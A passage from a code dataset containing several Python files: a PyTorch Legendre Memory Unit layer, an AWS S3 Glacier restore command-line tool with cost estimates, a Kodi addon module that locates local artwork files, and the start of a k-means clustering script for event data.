self.hidden_size = hidden_size\n self.memory_size = memory_size\n self.f = nn.Tanh()\n\n A, B = self.stateSpaceMatrices(memory_size, theta)\n A = torch.from_numpy(A).float()\n B = torch.from_numpy(B).float()\n\n if learn_a:\n self.A = nn.Parameter(A)\n else:\n self.register_buffer(\"A\", A)\n\n if learn_b:\n self.B = nn.Parameter(B)\n else:\n self.register_buffer(\"B\", B)\n\n # Declare Model parameters:\n # Encoding vectors\n self.e_x = nn.Parameter(torch.empty(1, input_size))\n self.e_h = nn.Parameter(torch.empty(1, hidden_size))\n self.e_m = nn.Parameter(torch.empty(1, memory_size))\n # Kernels\n self.W_x = nn.Parameter(torch.empty(hidden_size, input_size))\n self.W_h = nn.Parameter(torch.empty(hidden_size, hidden_size))\n self.W_m = nn.Parameter(torch.empty(hidden_size, memory_size))\n\n self.initParameters()\n\n def initParameters(self):\n \"\"\"Initialize the cell's parameters.\"\"\"\n\n # Initialize encoders\n leCunUniform(self.e_x)\n leCunUniform(self.e_h)\n init.constant_(self.e_m, 0)\n # Initialize kernels\n init.xavier_normal_(self.W_x)\n init.xavier_normal_(self.W_h)\n init.xavier_normal_(self.W_m)\n\n def stateSpaceMatrices(self, memory_size, theta):\n \"\"\"Returns the discretized state space matrices A and B.\"\"\"\n\n Q = np.arange(memory_size, dtype=np.float64).reshape(-1, 1)\n R = (2 * Q + 1) / theta\n i, j = np.meshgrid(Q, Q, indexing=\"ij\")\n\n # Continuous\n A = R * np.where(i < j, -1, (-1.0) ** (i - j + 1))\n B = R * ((-1.0) ** Q)\n C = np.ones((1, memory_size))\n D = np.zeros((1,))\n\n # Convert to discrete\n A, B, C, D, dt = cont2discrete(system=(A, B, C, D), dt=1.0, method=\"zoh\")\n\n return A, B\n\n def forward(self, x, state):\n \"\"\"\n Parameters:\n x (torch.tensor):\n Input of size [batch_size, input_size]\n state (tuple):\n h (torch.tensor) : [batch_size, hidden_size]\n m (torch.tensor) : [batch_size, memory_size]\n \"\"\"\n\n h, m = state\n\n # Equation (7) of the paper\n u = (\n F.linear(x, self.e_x) + F.linear(h, self.e_h) + F.linear(m, self.e_m)\n ) # [batch_size, 1]\n\n # Equation (4) of the paper\n m = F.linear(m, self.A) + F.linear(u, self.B) # [batch_size, memory_size]\n\n # Equation (6) of the paper\n h = self.f(\n F.linear(x, self.W_x) + F.linear(h, self.W_h) + F.linear(m, self.W_m)\n ) # [batch_size, hidden_size]\n\n return h, m\n\n\nclass LMU(nn.Module):\n \"\"\"LMU layer.\n\n Parameters:\n input_size (int) :\n Size of the input vector (x_t)\n hidden_size (int) :\n Size of the hidden vector (h_t)\n memory_size (int) :\n Size of the memory vector (m_t)\n theta (int) :\n The number of timesteps in the sliding window\n that is represented using the LTI system\n learn_a (boolean) :\n Whether to learn the matrix A (default = False)\n learn_b (boolean) :\n Whether to learn the matrix B (default = False)\n \"\"\"\n\n def __init__(\n self, input_size, hidden_size, memory_size, theta, learn_a=False, learn_b=False\n ):\n super(LMU, self).__init__()\n self.hidden_size = hidden_size\n self.memory_size = memory_size\n self.cell = LMUCell(\n input_size, hidden_size, memory_size, theta, learn_a, learn_b\n )\n\n def forward(self, x, state=None):\n \"\"\"\n Parameters:\n x (torch.tensor):\n Input of size [batch_size, seq_len, input_size]\n state (tuple) : (default = None)\n h (torch.tensor) : [batch_size, hidden_size]\n m (torch.tensor) : [batch_size, memory_size]\n \"\"\"\n\n # Assuming batch dimension is always first,\n # followed by seq. length as the second dimension\n batch_size = x.size(0)\n seq_len = x.size(1)\n\n # Initial state (h_0, m_0)\n if state is None:\n h_0 = torch.zeros(batch_size, self.hidden_size)\n m_0 = torch.zeros(batch_size, self.memory_size)\n if x.is_cuda:\n h_0 = h_0.cuda()\n m_0 = m_0.cuda()\n state = (h_0, m_0)\n\n # Iterate over the timesteps\n output = []\n for t in range(seq_len):\n x_t = x[:, t, :] # [batch_size, input_size]\n h_t, m_t = self.cell(x_t, state)\n state = (h_t, m_t)\n output.append(h_t)\n\n output = torch.stack(output) # [seq_len, batch_size, hidden_size]\n output = output.permute(1, 0, 2) # [batch_size, seq_len, hidden_size]\n\n return output, state # state is (h_n, m_n) where n = seq_len\n\n\nclass LMUFFT(nn.Module):\n \"\"\"Parallelized LMU Layer.\n\n Parameters:\n input_size (int) :\n Size of the input vector (x_t)\n hidden_size (int) :\n Size of the hidden vector (h_t)\n memory_size (int) :\n Size of the memory vector (m_t)\n seq_len (int) :\n Size of the sequence length (n)\n theta (int) :\n The number of timesteps in the sliding\n window that is represented using the LTI system\n \"\"\"\n\n def __init__(self, input_size, hidden_size, memory_size, seq_len, theta):\n super(LMUFFT, self).__init__()\n\n self.hidden_size = hidden_size\n self.memory_size = memory_size\n self.seq_len = seq_len\n self.theta = theta\n\n self.W_u = nn.Linear(in_features=input_size, out_features=1)\n self.f_u = nn.ReLU()\n self.W_h = nn.Linear(\n in_features=memory_size + input_size, out_features=hidden_size\n )\n self.f_h = nn.ReLU()\n\n A, B = self.stateSpaceMatrices()\n self.register_buffer(\"A\", A) # [memory_size, memory_size]\n self.register_buffer(\"B\", B) # [memory_size, 1]\n\n H, fft_H = self.impulse()\n self.register_buffer(\"H\", H) # [memory_size, seq_len]\n self.register_buffer(\"fft_H\", fft_H) # [memory_size, seq_len + 1]\n\n def stateSpaceMatrices(self):\n \"\"\"Returns the discretized state space matrices A and B.\"\"\"\n\n Q = np.arange(self.memory_size, dtype=np.float64).reshape(-1, 1)\n R = (2 * Q + 1) / self.theta\n i, j = np.meshgrid(Q, Q, indexing=\"ij\")\n\n # Continuous\n A = R * np.where(i < j, -1, (-1.0) ** (i - j + 1))\n B = R * ((-1.0) ** Q)\n C = np.ones((1, self.memory_size))\n D = np.zeros((1,))\n\n # Convert to discrete\n A, B, C, D, dt = cont2discrete(system=(A, B, C, D), dt=1.0, method=\"zoh\")\n\n # To torch.tensor\n A = torch.from_numpy(A).float() # [memory_size, memory_size]\n B = torch.from_numpy(B).float() # [memory_size, 1]\n\n return A, B\n\n def impulse(self):\n \"\"\"Returns the matrices H and the 1D Fourier transform of H (Equations\n 23, 26 of the paper)\"\"\"\n\n H = []\n A_i = torch.eye(self.memory_size)\n for t in range(self.seq_len):\n H.append(A_i @ self.B)\n A_i = self.A @ A_i\n\n H = torch.cat(H, dim=-1) # [memory_size, seq_len]\n fft_H = fft.rfft(H, n=2 * self.seq_len, dim=-1) # [memory_size, seq_len + 1]\n\n return H, fft_H\n\n def forward(self, x):\n \"\"\"\n Parameters:\n x (torch.tensor):\n Input of size [batch_size, seq_len, input_size]\n \"\"\"\n\n batch_size, seq_len, input_size = x.shape\n\n # Equation 18 of the paper\n u = self.f_u(self.W_u(x)) # [batch_size, seq_len, 1]\n\n # Equation 26 of the paper\n fft_input = u.permute(0, 2, 1) # [batch_size, 1, seq_len]\n fft_u = fft.rfft(\n fft_input, n=2 * seq_len, dim=-1\n ) # [batch_size, seq_len, seq_len+1]\n\n # Element-wise multiplication (uses broadcasting)\n # [batch_size, 1, seq_len+1] * [1, memory_size, seq_len+1]\n temp = fft_u * self.fft_H.unsqueeze(0) # [batch_size, memory_size, seq_len+1]\n\n m = fft.irfft(\n temp, n=2 * seq_len, dim=-1\n ) # [batch_size, memory_size, seq_len+1]\n m = m[:, :, :seq_len] # [batch_size, memory_size, seq_len]\n m = m.permute(0, 2, 1) # [batch_size, seq_len, memory_size]\n\n # Equation 20 of the paper (W_m@m + W_x@x W@[m;x])\n input_h = torch.cat(\n (m, x), dim=-1\n ) # [batch_size, seq_len, memory_size + input_size]\n h = self.f_h(self.W_h(input_h)) # [batch_size, seq_len, hidden_size]\n\n h_n = h[:, -1, :] # [batch_size, hidden_size]\n\n return h, h_n\n","repo_name":"proroklab/popgym","sub_path":"popgym/baselines/models/lmu.py","file_name":"lmu.py","file_ext":"py","file_size_in_byte":10069,"program_lang":"python","lang":"en","doc_type":"code","stars":110,"dataset":"github-code","pt":"21"} +{"seq_id":"7996192662","text":"#!/usr/bin/env python\n\"\"\"\nModule Docstring\n\"\"\"\n\nfrom .version import __version__\n__author__ = \"Matt Olm\"\n__version__ = __version__\n__license__ = \"MIT\"\n\nimport os\nimport sys\nimport boto3\nimport time\nimport copy\nimport argparse\nimport logging\nimport awswrangler\nfrom time import sleep\n\nimport pandas as pd\nimport glrestore.s3_utils\n\ndef main():\n \"\"\" This is executed when run from the command line \"\"\"\n args = parse_args()\n RestoreController(args).main()\n\nclass RestoreController(object):\n \"\"\"\n Main controller of the restore command\n \"\"\"\n def __init__(self, args):\n \"\"\"\n Initialize and store args\n \"\"\"\n self.args = args\n self.ori_args = copy.deepcopy(args)\n self.kwargs = vars(self.args)\n\n def main(self):\n \"\"\"\n The main controller for restore\n \"\"\"\n self.parse_arguments()\n\n logging.debug(\"Get objects to restore\")\n self.file_classifications = self.get_files_to_restore_v2(self.kwargs.get('files'))\n\n if self.kwargs.get('report', True):\n logging.info(\"\\n!!!!!!!!!!!\\nWill NOT RESTORE anything because of --report flag; the following information is FYI only\\n!!!!!!!!!!!!\")\n\n logging.debug(\"Print status\")\n self.print_status(sleep=False)\n\n logging.debug(\"Create report\")\n self.create_report()\n\n else:\n logging.debug(\"Print status\")\n self.print_status()\n\n logging.debug(\"Restoring files\")\n self.restore_files()\n\n if self.kwargs.get('wait'):\n self.wait_for_restore()\n\n\n def parse_arguments(self):\n \"\"\"\n Parse the arguments and add them this object as attributes\n \"\"\"\n args = self.kwargs\n\n # Set up the log\n self.setup_log()\n\n # Set up boto3\n if 'profile' in args:\n boto3.setup_default_session(profile_name=args.get('profile'))\n else:\n session = boto3.session.Session()\n self.kwargs.client = session.client(\"s3\")\n\n def get_files_to_restore_v2(self, files):\n \"\"\"\n Return a list of s3 files to restore\n \"\"\"\n # Get the command line argument\n base_restore = files\n\n # Load files if need be\n to_restore = []\n for br in base_restore:\n if not br.startswith('s3://'):\n with open(br, 'r') as r:\n for line in r.readlines():\n if not line.startswith('s3://'):\n logging.error(f\"CRITICAL ERROR! You passed {br} to -f, which doesn't start with s3://. I assumed this was a file of files to restore, but the line {line} also doesn't start with s3://. Will ignore {br} and {line}\")\n else:\n to_restore.append(line.strip())\n else:\n to_restore.append(br)\n\n dbs = []\n for br in to_restore:\n db = glrestore.s3_utils.get_object_storage_class_v2(br)\n dbs.append(db)\n\n fc = pd.concat(dbs).reset_index(drop=True)\n return fc\n\n def print_status(self, sleep=True):\n \"\"\"\n Print status and estimated costs\n \"\"\"\n debug = self.kwargs.get('debug', False)\n\n cdb = self.file_classifications\n logging.info(f\"Identified {len(cdb)} files\")\n\n tdb = cdb[cdb['restore_status'] != False]\n logging.info(f\"Of these, {len(tdb)} are being actively restored or are already restored\")\n\n tdb = cdb[~cdb['storage_class'].isin(['GLACIER', 'DEEP_ARCHIVE'])]\n logging.info(f\"Of these, {len(tdb)} are not in glacier\")\n\n fcdb = cdb[(cdb['restore_status'] == False) & (cdb['storage_class'].isin(['GLACIER', 'DEEP_ARCHIVE']))]\n logging.info(f\"Restoring the remaining {len(fcdb)} objects will cost the following:\")\n\n self.display_restore_costs(fcdb, sleep=sleep)\n\n self.files_to_restore_filtered = fcdb['file'].tolist()\n\n if debug:\n for f in fcdb['file'].tolist():\n logging.debug(f)\n\n def create_report(self):\n \"\"\"\n Create a report instead of actually restoring anything\n \"\"\"\n outloc = self.kwargs.get('output')\n if not outloc.endswith('.csv'):\n outloc += '.csv'\n\n cdb = self.file_classifications\n logging.info(f\"Identified {len(cdb)} files. Will create a report on them at {outloc}\")\n cdb.to_csv(outloc, index=False)\n\n\n def display_restore_costs(self, fcdb, sleep=True):\n \"\"\"\n Print how much this is going to cost\n\n NOTE- YOURE TREATING EVERYTHING AS IF IT'S BEING RESTORED FROM DEEP ARCHIVE; the \"standard\" is actully a bit cheaper when restoring from flexible\n \"\"\"\n S3_COST_PER_GB_PER_MONTH = 0.022\n\n TIER2REQUEST2COST = {\n 'Expedited':10,\n 'Standard':0.10,\n 'Bulk':0.025\n }\n TIER2REQUEST2SIZE_COST = {\n 'Expedited': 0.03,\n 'Standard': 0.02,\n 'Bulk': 0.0025\n }\n\n # 0) Calculate the size and number of objects to restore\n num_obs = len(fcdb)\n size_obs = sum(fcdb['size_bytes']) / 1e9\n tier = self.kwargs.get('speed')\n\n # 1) Calculate the cost for the extra storage\n storage_cost = size_obs * (self.kwargs.get('days') / 30) * S3_COST_PER_GB_PER_MONTH\n\n # 2) Calculate the cost for the retrival costs\n t2cs = {}\n for t in ['Expedited', 'Standard', 'Bulk']:\n t2cs[t] = [(num_obs / 1000) * TIER2REQUEST2COST[t], size_obs * TIER2REQUEST2SIZE_COST[t]]\n\n # Display this info\n msg = \"\\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\\n\"\n\n msg += f\"It will cost the following to restore {num_obs} objects totalling {size_obs:.2f}GB:\\n\"\n for t, d in t2cs.items():\n msg += f\"\\t{t}: ${d[0]:.2f} + ${d[1]:.2f}\\n\"\n\n msg += f\"It will also cost ${storage_cost:.2f} to restore the {size_obs:.3f}GB of data for {self.kwargs.get('days')} days\"\n msg += '\\n----------------------------\\n'\n msg += f\"Your TOTAL COST at {tier} speed will be ${storage_cost + sum(t2cs[tier]):0.2f}\\n\"\n msg += '\\n----------------------------\\n'\n\n if sleep:\n msg += f\"You chose to restore at {tier} speed. Please quit the program now (ctrl + c) if you'd like to change that! I'll wait 5 seconds\"\n msg += \"\\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\\n\"\n\n logging.info(msg)\n if sleep:\n time.sleep(5)\n\n def restore_files(self):\n \"\"\"\n Actually do the file restoring\n \"\"\"\n files_to_restore_filtered = self.files_to_restore_filtered\n\n for f in files_to_restore_filtered:\n\n glrestore.s3_utils.restore_file(f, **self.kwargs)\n\n logging.info(f\"Restore commands finished launching\")\n\n def wait_for_restore(self):\n \"\"\"\n Enter the loop where you wait for objects to restore before exiting the program\n \"\"\"\n remaining = self.files_to_restore_filtered\n print(f\"I am going to wait for {len(remaining)} files to be restored\")\n\n start = time.time()\n while True:\n sleep(300)\n\n cdb = self.get_files_to_restore_v2(remaining)\n remaining = cdb[(cdb['restore_status'] == \"restoring\")]['file'].tolist()\n\n if len(remaining) == 0:\n break\n\n elapsed = time.time() - start\n\n sys.stdout.write('\\r')\n # the exact output you're looking for:\n sys.stdout.write(f'Ive been waiting for {time.strftime(\"%Hh%Mm%Ss\", time.gmtime(elapsed))}: {len(remaining)} files remain')\n sys.stdout.flush()\n\n elapsed = time.time() - start\n print(f'All done! The restore took {time.strftime(\"%Hh%Mm%Ss\", time.gmtime(elapsed))}')\n\n def setup_log(self):\n args = self.kwargs\n\n # Set up the log\n root = logging.getLogger()\n\n if args.get('debug', False):\n root.setLevel(logging.DEBUG)\n else:\n root.setLevel(logging.INFO)\n\n handler = logging.StreamHandler(sys.stdout)\n if args.get('debug', False):\n root.setLevel(logging.DEBUG)\n else:\n handler.setLevel(logging.INFO)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n handler.setFormatter(formatter)\n root.addHandler(handler)\n\n # Play debug message\n logging.debug(\"!\" * 80)\n logging.debug(\"Command to run was: {0}\\n\".format(' '.join(sys.argv)))\n logging.debug(\"glrestore version {0} was run \\n\".format(__version__))\n logging.debug(\"!\" * 80 + '\\n')\n\n\ndef controller(args):\n \"\"\" Main entry point of the app \"\"\"\n logging.info(\"hello world\")\n logging.info(args)\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n '-f', '--files',\n help=\"File or files to be restored (or a list of files). Can include wildcards. Must start with the bucket in the format (s3://)\",\n nargs='*', default=[])\n\n parser.add_argument(\n '-d', '--days',\n help=\"Number of days to restore the data to S3 for. During this time we pay for both glacier and S3 storage of the data.\",\n default=7, type=int)\n\n parser.add_argument(\n '-s', '--speed',\n help=\"Speed at which to restore the data; faster is more expensive. Expedited=(1-5 min), Standard=(3-5 hr), Bulk=(12 hr)\",\n default='Expedited', choices=['Expedited', 'Standard', 'Bulk'],)\n\n parser.add_argument(\n '--profile',\n help=\"AWS credential profile to use. Will use default by default\")\n\n parser.add_argument(\n '--report',\n help='Rather than actually doing anything, just make a report of which files are matched by the -f argument and what their status is. Will make a file with this info based on the name in the -o argument',\n default=False, action=\"store_true\")\n\n parser.add_argument(\n '-o', '--output',\n help='Where to store the --report information',\n default='glrestore_report.txt')\n\n parser.add_argument(\n '--wait',\n help='Wait for restore to finish before exiting the program. Works with --report too',\n default=False, action=\"store_true\")\n\n parser.add_argument(\n '--debug',\n help='Create debugging log file',\n default=False, action= \"store_true\")\n\n parser.add_argument(\n \"--version\",\n action=\"version\",\n version=\"%(prog)s (version {version})\".format(version=__version__))\n\n args = parser.parse_args()\n return args\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"MrOlm/glrestore","sub_path":"glrestore/glrestore.py","file_name":"glrestore.py","file_ext":"py","file_size_in_byte":10702,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20900641766","text":"import os\nimport xbmcvfs\nfrom abc import ABCMeta\n\nfrom lib.libs import mediatypes\nfrom lib.libs.addonsettings import settings\nfrom lib.libs.mediainfo import arttype_matches_base, format_arttype, find_central_infodir\nfrom lib.libs.utils import SortedDisplay, natural_sort, get_movie_path_list, get_pathsep, \\\n iter_possible_cleannames, parent_dir\n\nARTWORK_EXTS = ('.jpg', '.png', '.gif')\nARTIST_INFOFOLDER_PROVIDER = SortedDisplay('file:art', 20223)\n\nARTTYPE_MAXLENGTH = 30\n\nclass ArtFilesAbstractProvider(object):\n __metaclass__ = ABCMeta\n # 13514 = Local art\n name = SortedDisplay('file:art', 13514)\n\n def buildimage(self, url, title, fromartistfolder=False):\n provider = ARTIST_INFOFOLDER_PROVIDER if fromartistfolder else self.name\n result = {'url': url, 'provider': provider, 'preview': url}\n result['title'] = title\n result['rating'] = SortedDisplay(0, '')\n result['size'] = SortedDisplay(0, '')\n result['language'] = 'xx'\n return result\n\n def getextra(self, path, exacttypes, thumbs=False):\n arttype = 'thumb' if thumbs else 'fanart'\n extradir = 'extrathumbs' if thumbs else 'extrafanart'\n sep = get_pathsep(path)\n missing, nextno = getopentypes(exacttypes, arttype)\n path += extradir + sep\n _, files = xbmcvfs.listdir(path)\n files.sort(key=natural_sort)\n result = {}\n for filename in files:\n check_filename = filename.lower()\n if not check_filename.endswith(ARTWORK_EXTS):\n continue\n popped = missing.pop(0) if missing else None\n nexttype = popped if popped else format_arttype(arttype, nextno)\n result[nexttype] = self.buildimage(path + filename, extradir + sep + filename)\n if not popped:\n nextno += 1\n return result\n\nclass ArtFilesSeriesProvider(ArtFilesAbstractProvider):\n mediatype = mediatypes.TVSHOW\n\n alttypes = {'logo': 'clearlogo', 'character': 'characterart'}\n\n def get_exact_images(self, mediaitem):\n path = mediaitem.file\n dirs, files = xbmcvfs.listdir(path)\n files.sort(key=natural_sort)\n result = {}\n for filename in files:\n check_filename = filename.lower()\n if not check_filename.endswith(ARTWORK_EXTS):\n continue\n basefile = os.path.splitext(check_filename)[0]\n if '.' in basefile or ' ' in basefile:\n continue\n if basefile.startswith('season') and basefile.count('-'):\n seasonsplit = basefile.split('-')\n if len(seasonsplit) == 3:\n if seasonsplit[1] not in ('specials', 'all'):\n continue\n number = 0 if seasonsplit[1] == 'specials' else -1\n arttype = seasonsplit[2]\n elif len(seasonsplit) == 2:\n try:\n number = int(seasonsplit[0].replace('season', ''))\n except ValueError:\n continue\n arttype = seasonsplit[1]\n else:\n continue\n if not arttype.isalnum():\n continue\n arttype = 'season.{0}.{1}'.format(number, arttype)\n else:\n if not basefile.isalnum() or len(basefile) > ARTTYPE_MAXLENGTH:\n continue\n arttype = basefile\n if settings.identify_alternatives and arttype in self.alttypes.keys():\n arttype = self.alttypes[arttype]\n if arttype in result.keys():\n continue\n result[arttype] = self.buildimage(path + filename, filename)\n\n if dirs and 'extrafanart' in dirs:\n result.update(self.getextra(path, result.keys()))\n\n return result\n\nclass ArtFilesMovieProvider(ArtFilesAbstractProvider):\n mediatype = mediatypes.MOVIE\n\n alttypes = {'logo': 'clearlogo', 'disc': 'discart'}\n\n def get_exact_images(self, mediaitem):\n path = mediaitem.file\n paths = get_movie_path_list(path)\n result = {}\n sep = get_pathsep(path)\n path = os.path.dirname(paths[0]) + sep\n havespecific = []\n for dirname, moviefile in (os.path.split(p) for p in paths):\n dirname += sep\n check_moviebase = os.path.splitext(moviefile)[0].lower()\n dirs, files = xbmcvfs.listdir(dirname)\n for filename in files:\n check_filename = filename.lower()\n if not check_filename.endswith(ARTWORK_EXTS):\n continue\n imagefile = os.path.splitext(check_filename)[0]\n specific = False\n if '-' in imagefile:\n firstbit, imagefile = imagefile.rsplit('-', 1)\n if firstbit != check_moviebase:\n continue\n specific = True\n if not imagefile.isalnum() or len(imagefile) > ARTTYPE_MAXLENGTH:\n continue\n arttype = imagefile\n if settings.identify_alternatives and arttype in self.alttypes.keys():\n arttype = self.alttypes[arttype]\n if arttype in result.keys():\n continue\n if specific or arttype not in havespecific:\n result[arttype] = self.buildimage(dirname + filename, filename)\n if specific:\n havespecific.append(arttype)\n\n if dirs:\n if 'extrafanart' in dirs:\n result.update(self.getextra(path, result.keys()))\n if 'extrathumbs' in dirs:\n result.update(self.getextra(path, result.keys(), True))\n\n return result\n\nclass ArtFilesMovieSetProvider(ArtFilesAbstractProvider):\n mediatype = mediatypes.MOVIESET\n\n alttypes = {'logo': 'clearlogo', 'folder': 'thumb'}\n\n def get_exact_images(self, mediaitem):\n path, inputfilename = os.path.split(mediaitem.file)\n sep = get_pathsep(path)\n path += sep\n dirs, files = xbmcvfs.listdir(path)\n check_inputbase = os.path.splitext(inputfilename)[0] if inputfilename else ''\n result = {}\n if inputfilename:\n dirname = next((name for name in dirs if name in iter_possible_cleannames(check_inputbase)), None)\n if dirname: # '[centraldir]/[set name]/[arttype].[ext]'\n dirname = path + dirname + sep\n _, dfiles = xbmcvfs.listdir(dirname)\n for filename in dfiles:\n if not filename.endswith(ARTWORK_EXTS):\n continue\n arttype = os.path.splitext(filename)[0]\n if not arttype.isalnum() or len(arttype) > ARTTYPE_MAXLENGTH:\n continue\n if settings.identify_alternatives and arttype in self.alttypes.keys():\n arttype = self.alttypes[arttype]\n if arttype in result.keys():\n continue\n\n result[arttype] = self.buildimage(dirname + filename, filename)\n\n if not result:\n for filename in files:\n if not filename.endswith(ARTWORK_EXTS):\n continue\n basefile = os.path.splitext(filename)[0]\n if check_inputbase: # '[centraldir]/[set name]-[arttype].[ext]'\n if '-' not in basefile:\n continue\n firstbit, arttype = basefile.rsplit('-', 1)\n if not arttype.isalnum() or firstbit not in iter_possible_cleannames(check_inputbase):\n continue\n else: # parent of movie directory\n if not basefile.isalnum() or len(basefile) > ARTTYPE_MAXLENGTH:\n continue\n arttype = basefile\n\n if settings.identify_alternatives and arttype in self.alttypes.keys():\n arttype = self.alttypes[arttype]\n if arttype in result.keys():\n continue\n\n result[arttype] = self.buildimage(path + filename, filename)\n return result\n\nclass ArtFilesEpisodeProvider(ArtFilesAbstractProvider):\n mediatype = mediatypes.EPISODE\n\n def get_exact_images(self, mediaitem):\n path, inputfilename = os.path.split(mediaitem.file)\n path += get_pathsep(path)\n _, files = xbmcvfs.listdir(path)\n check_inputbase = os.path.splitext(inputfilename)[0].lower()\n result = {}\n for filename in files:\n check_filename = filename.lower()\n if not check_filename.endswith(ARTWORK_EXTS):\n continue\n basefile = os.path.splitext(check_filename)[0]\n if '-' not in basefile:\n continue\n firstbit, arttype = basefile.rsplit('-', 1)\n if firstbit != check_inputbase or not arttype.isalnum():\n continue\n\n result[arttype] = self.buildimage(path + filename, filename)\n return result\n\nclass ArtFilesMusicVideoProvider(ArtFilesAbstractProvider):\n mediatype = mediatypes.MUSICVIDEO\n\n alttypes = {'logo': 'clearlogo', 'disc': 'discart', 'cdart': 'discart'}\n\n def get_exact_images(self, mediaitem):\n path, inputfilename = os.path.split(mediaitem.file)\n path += get_pathsep(path)\n dirs, files = xbmcvfs.listdir(path)\n check_inputbase = os.path.splitext(inputfilename)[0].lower()\n paths = get_movie_path_list(path)\n result = {}\n sep = get_pathsep(path)\n path = os.path.dirname(paths[0]) + sep\n havespecific = []\n for filename in files:\n check_filename = filename.lower()\n if not check_filename.endswith(ARTWORK_EXTS):\n continue\n basefile = os.path.splitext(check_filename)[0]\n specific = False\n if '-' in basefile:\n firstbit, basefile = basefile.rsplit('-', 1)\n if firstbit != check_inputbase:\n continue\n specific = True\n if not basefile.isalnum() or len(basefile) > ARTTYPE_MAXLENGTH:\n continue\n arttype = basefile\n if settings.identify_alternatives and arttype in self.alttypes.keys():\n arttype = self.alttypes[arttype]\n if arttype in result.keys():\n continue\n if specific or arttype not in havespecific:\n result[arttype] = self.buildimage(path + filename, filename)\n if specific:\n havespecific.append(arttype)\n\n if dirs:\n if 'extrafanart' in dirs:\n result.update(self.getextra(path, result.keys()))\n if 'extrathumbs' in dirs:\n result.update(self.getextra(path, result.keys(), True))\n\n return result\n\nclass ArtFilesArtistProvider(ArtFilesAbstractProvider):\n mediatype = mediatypes.ARTIST\n\n alttypes = {'folder': 'thumb', 'logo': 'clearlogo'}\n\n def get_exact_images(self, mediaitem):\n path = find_central_infodir(mediaitem)\n if not path:\n return {}\n _, files = xbmcvfs.listdir(path)\n result = {}\n for filename in files:\n check_filename = filename.lower()\n if not check_filename.endswith(ARTWORK_EXTS):\n continue\n arttype = os.path.splitext(check_filename)[0]\n if not arttype.isalnum() or len(arttype) > ARTTYPE_MAXLENGTH:\n continue\n if settings.identify_alternatives and arttype in self.alttypes.keys():\n arttype = self.alttypes[arttype]\n if arttype in result.keys():\n continue\n result[arttype] = self.buildimage(path + filename, filename, True)\n return result\n\nclass ArtFilesAlbumProvider(ArtFilesArtistProvider):\n mediatype = mediatypes.ALBUM\n\n alttypes = {'folder': 'thumb', 'cover': 'thumb', 'disc': 'discart', 'cdart': 'discart'}\n\n def get_exact_images(self, mediaitem):\n paths = (mediaitem.file, find_central_infodir(mediaitem))\n if settings.albumartwithmediafiles:\n paths = (paths[1], paths[0])\n result = {}\n for path in paths:\n if not path:\n continue\n _, files = xbmcvfs.listdir(path)\n for filename in files:\n check_filename = filename.lower()\n if not check_filename.endswith(ARTWORK_EXTS):\n continue\n arttype = os.path.splitext(check_filename)[0]\n if not arttype.isalnum() or len(arttype) > ARTTYPE_MAXLENGTH:\n continue\n if settings.identify_alternatives and arttype in self.alttypes.keys():\n arttype = self.alttypes[arttype]\n if arttype in result.keys():\n continue\n result[arttype] = self.buildimage(path + filename, filename, path != mediaitem.file)\n\n for disc in sorted(mediaitem.discfolders.keys()):\n path = mediaitem.discfolders[disc]\n _, files = xbmcvfs.listdir(path)\n for filename in files:\n check_filename = filename.lower()\n if not check_filename.endswith(ARTWORK_EXTS):\n continue\n arttype = os.path.splitext(check_filename)[0]\n if not arttype.isalnum() or len(arttype) > ARTTYPE_MAXLENGTH:\n continue\n if settings.identify_alternatives and arttype in self.alttypes.keys():\n arttype = self.alttypes[arttype]\n parentdir = parent_dir(path) + get_pathsep(path)\n if arttype == 'discart':\n if 'discart' not in result:\n result['discart'] = self.buildimage(path + filename, parentdir + filename)\n if not disc:\n continue\n arttype += str(disc)\n if arttype in result:\n continue\n result[arttype] = self.buildimage(path + filename, parentdir + filename)\n\n return result\n\nclass ArtFilesSongProvider(ArtFilesAbstractProvider):\n mediatype = mediatypes.SONG\n\n def get_exact_images(self, mediaitem):\n paths = (mediaitem.file, find_central_infodir(mediaitem))\n if not paths[0] and not paths[1]:\n return {}\n if settings.albumartwithmediafiles:\n paths = (paths[1], paths[0])\n if mediaitem.file:\n check_inputbase = os.path.splitext(os.path.basename(mediaitem.file))[0].lower()\n result = {}\n for path in paths:\n if not path:\n continue\n centraldir = path != mediaitem.file\n path = os.path.dirname(path) + get_pathsep(path)\n _, files = xbmcvfs.listdir(path)\n for filename in files:\n check_filename = filename.lower()\n if not check_filename.endswith(ARTWORK_EXTS):\n continue\n basefile = os.path.splitext(check_filename)[0]\n if '-' not in basefile:\n continue\n firstbit, arttype = basefile.rsplit('-', 1)\n if not arttype.isalnum():\n continue\n if not centraldir and firstbit != check_inputbase:\n continue\n if centraldir and firstbit not in (i.lower() for i in iter_possible_cleannames(mediaitem.label)):\n continue\n result[arttype] = self.buildimage(path + filename, filename, centraldir)\n return result\n\ndef getopentypes(existingtypes, arttype):\n keys = [exact for exact in sorted(existingtypes, key=natural_sort)\n if arttype_matches_base(arttype, exact)]\n missing = []\n nextstart = 0\n for count in range(100):\n if not keys:\n nextstart = count\n break\n exact = format_arttype(arttype, count)\n if exact in keys:\n keys.remove(exact)\n else:\n missing.append(exact)\n return missing, nextstart\n","repo_name":"henryjfry/repository.thenewdiamond","sub_path":"script.artwork.beef/lib/providers/artfiles.py","file_name":"artfiles.py","file_ext":"py","file_size_in_byte":16393,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"15042305966","text":"from sklearn.cluster import KMeans\nfrom pandas import DataFrame\nimport pandas as pd\n\nna = ['None', ' ', 'NA', '']\npath = \"data/events.csv\"\noutput_path = \"data/cluster_events.csv\"\nevents = pd.read_csv(path, header=0, na_values=na)\nevents_id = events.ix[:, 0]\nevents_keywords = events.ix[:, 10:] \n\n\nkmeans = KMeans(n_clusters = 50, max_iter = 40, n_init = 4)\nclusters = DataFrame(kmeans.fit_predict(events_keywords))\nresult = pd.concat([events_id, clusters], axis=1, join='inner', )\nresult.columns = ['event_id', 'cluster']\nresult.to_csv(output_path, na_rep = 'NA', header = True, index = 